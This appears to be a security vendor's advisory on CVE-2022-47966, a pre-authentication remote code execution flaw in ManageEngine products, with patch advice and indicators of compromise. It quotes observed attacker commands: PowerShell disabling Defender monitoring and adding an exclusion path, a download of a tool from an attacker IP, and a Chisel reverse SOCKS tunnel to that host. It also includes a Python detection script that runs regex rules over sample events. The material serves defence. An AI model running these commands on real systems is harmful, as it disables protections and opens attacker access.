overview

A vulnerability that is currently being exploited in the wild was found in two dozen ManageEngine products. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.

CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Patches were released between October and November 2022, but the timing of the fixed-version releases varies by product.

During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.

As previously stated, an obsolete version of the Apache Santuario library, which implements XML security standards, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently enabled, or has previously been enabled, on those products.

Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory patch immediately.


avertium's recommendations

Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.


INDICATORS OF COMPROMISE (IoCs)

IP Addresses

  • 28.193[.]216
  • 93.193[.]64
  • 68.7[.]122

Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)

  • 001 Defense Evasion: Disable / Modify Tools (disable Defender real-time monitoring)
    • Example:

      powershell -windowstyle hidden set-mppreference -disablerealtimemonitoring

      set-mppreference -exclusionpath c:\users\public

  • T1105 Ingress Tool Transfer: PowerShell cmdlet Invoke-WebRequest (IWR) used to download additional remote access tools
    • Example:

      invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe

  • T1572 Protocol Tunneling: Chisel, a Golang implementation of a protocol tunneling tool similar to Plink, used to tunnel over a SOCKS proxy
    • Example:

      c:\users\public\svhost.exe client 111.68.7[.]122:8080 R:0.0.0.0:43566:socks
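The three post-exploitation behaviours above are easy to hunt for in process-creation telemetry. The following added example (not from the advisory or from Rapid7) runs simple detection rules for those behaviours over constructed Windows process-creation events; the host names, parent paths and the 203.0.113.10 address are made-up sample data, and the assumption that commands spawned directly by the ManageEngine Java process deserve the most scrutiny is the author's, not the page's.

```python
import re
from dataclasses import dataclass

# Constructed sample events shaped like (host, parent image, command line), modelled on the
# commands listed in the advisory. Not real telemetry; 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ("srv01", "C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe",
     "powershell -windowstyle hidden set-mppreference -disablerealtimemonitoring"),
    ("srv01", "powershell.exe", "set-mppreference -exclusionpath c:\\users\\public"),
    ("srv01", "powershell.exe",
     "invoke-webrequest -uri http://203.0.113.10:8081/svhost.exe -outfile c:\\users\\public\\svhost.exe"),
    ("srv01", "cmd.exe", "c:\\users\\public\\svhost.exe client 203.0.113.10:8080 R:0.0.0.0:43566:socks"),
    ("ws07", "explorer.exe", "powershell get-mppreference"),  # benign read-only query, must not fire
]

# One rule per technique named in the advisory: label -> case-insensitive regex over the command line.
RULES = {
    "Defense Evasion: Disable/Modify Tools": re.compile(
        r"set-mppreference\s+.*-(disablerealtimemonitoring|exclusionpath)\b", re.I),
    "T1105 Ingress Tool Transfer": re.compile(
        r"(invoke-webrequest|iwr)\s+.*-uri\s+https?://\S+\.exe\b", re.I),
    "T1572 Protocol Tunneling": re.compile(
        r"\bclient\s+\S+:\d+\s+R:\S+:socks\b", re.I),
}


@dataclass
class Hit:
    host: str
    technique: str
    parent: str
    command: str


def spawned_by_manageengine(parent: str) -> bool:
    """Assumption (not from the page): CVE-2022-47966 gives code execution inside the
    ManageEngine product's Java process, so children of that process are the highest-value hits."""
    return "manageengine" in parent.lower()


def detect(events):
    """Return one Hit per (event, rule) match; an event may match more than one rule."""
    hits = []
    for host, parent, cmdline in events:
        for technique, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append(Hit(host, technique, parent, cmdline))
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        flag = " [child of ManageEngine process]" if spawned_by_manageengine(h.parent) else ""
        print(f"{h.host}: {h.technique}{flag}: {h.command}")
```

Feed it real 4688 or Sysmon event 1 command lines and tune the regexes to your environment; the exclusion-path rule in particular will also catch legitimate administration, so review hits rather than auto-block.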


How Avertium is Protecting Our CUSTOMERS

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.
  • Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident like a malware attack.
  • Avertium offers VMaaS to provide a deeper understanding and control over organizational information security risks. If your enterprise is facing challenges with the scope, resources, or skills required to implement a vulnerability management program with your team, outsourced solutions can help you bridge the gap.


SUPPORTING DOCUMENTATION

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability | Rapid7 Blog

ManageEngine Security Advisories

PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) - Help Net Security
